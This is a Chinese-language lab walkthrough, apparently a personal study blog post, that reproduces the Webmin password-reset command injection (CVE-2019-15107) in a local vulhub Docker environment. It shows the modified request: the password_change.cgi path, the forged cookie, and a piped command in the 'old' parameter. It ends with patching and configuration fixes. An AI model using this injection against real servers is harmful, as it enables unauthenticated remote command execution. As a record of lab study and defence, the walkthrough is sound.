vulhub学习文档-Webmin远程命令执行漏洞复现

Webmin远程命令执行漏洞复现

一.漏洞介绍
(一)编号
CVE-2019-15107
(二)概述
Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。
(三)影响版本
Webmin <= 1.920
(四)适用条件
版本满足要求,且服务器的配置文件允许修改密码时,在不知道webmin的用户和密码条件下,可以任意执行代码。
二.操作步骤

(一)Vulhub
文件位于:/home/vulhub/vulhub-master/webmin/CVE-2019-15107
Ip:192.168.126.133
1.环境搭建 docker-compose build和docker-compose up -d
vulhub学习文档-Webmin远程命令执行漏洞复现_第1张图片

2.检查docker是否开启 docker-compose ps
在这里插入图片描述

  1. 测试登录 https://192.168.126.133:10000 必须加s
    vulhub学习文档-Webmin远程命令执行漏洞复现_第2张图片

(二)Windows
1.登录webmin https://192.168.126.133:10000
vulhub学习文档-Webmin远程命令执行漏洞复现_第3张图片
2.开启拦截抓包 并点击登录
vulhub学习文档-Webmin远程命令执行漏洞复现_第4张图片
3.发送到Repeater模块,进行数据修改,再点go
修改内容:
① 修改路径 session_ login.cgi 为 password_change.cgi(最开头)
② 修改Cookie为 Cookie: redirect=1; testing=1;sid=x; sessiontest=1
③ 修改参数 user=rootxx&pam=&expired=2&old=test|’id’&new1=test2&new2=test2
注:’id’处替换命令 例如ls(没有单引号)
vulhub学习文档-Webmin远程命令执行漏洞复现_第5张图片
vulhub学习文档-Webmin远程命令执行漏洞复现_第6张图片

4.使用getshell 还不会,待更
5.使用metasploit 还不会,待更

三.漏洞防护
(一)及时升级至1.93
(二)1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。

参考文章
https://cloud.tencent.com/developer/article/1511916
https://www.jianshu.com/p/6db98793d043
https://blog.csdn.net/Z_Grant/article/details/101213506

本篇为自我学习回顾,不能保证完全正确!!!
网络信息安全-ploto

你可能感兴趣的:(#,vulhub,安全漏洞)